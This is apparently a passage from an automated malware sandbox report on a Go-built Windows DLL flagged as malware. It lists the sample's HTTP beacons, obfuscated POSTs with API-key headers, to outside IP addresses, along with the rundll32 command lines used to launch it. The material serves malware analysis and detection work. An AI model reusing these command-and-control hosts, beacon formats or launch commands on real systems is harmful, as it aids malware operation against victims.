        Aug 9, 2024 19:31:24.508050919 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: OBPs4rXv
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.115820885 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:25 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        18 | 192.168.2.4 | 49759 | 77.238.229.63 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:25.030198097 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: DDiYiZL9
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.812309980 CEST | 165 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:25 GMT
        Content-Length: 1
        Data Raw: 0a
        Data Ascii:


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        19 | 192.168.2.4 | 49760 | 77.238.229.63 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:25.123140097 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: xrQPCMBk
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.768892050 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:25 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port
        20 | 192.168.2.4 | 49761 | 77.238.250.123 | 80
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:26.591015100 CEST | 296 | OUT | POST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 9stAvzmg
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:27.218018055 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:27 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port
        21 | 192.168.2.4 | 49762 | 77.238.250.123 | 80
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:26.591090918 CEST | 296 | OUT | POST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: xpzibzYr
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:27.217256069 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:27 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Target ID:0
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\System32\loaddll32.exe
        Wow64 process (32bit):true
        Commandline:loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll"
        Imagebase:0x140000
        File size:126'464 bytes
        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:1
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7699e0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:2
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\cmd.exe
        Wow64 process (32bit):true
        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Imagebase:0x240000
        File size:236'544 bytes
        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:3
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:4
        Start time:13:28:18
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:5
        Start time:13:28:21
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:6
        Start time:13:28:32
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:7
        Start time:13:28:33
        Start date:09/08/2024
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export
        Imagebase:0x7f0000
        File size:61'440 bytes
        MD5 hash:889B99C52A60DD49227C5E485A016679
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        No disassembly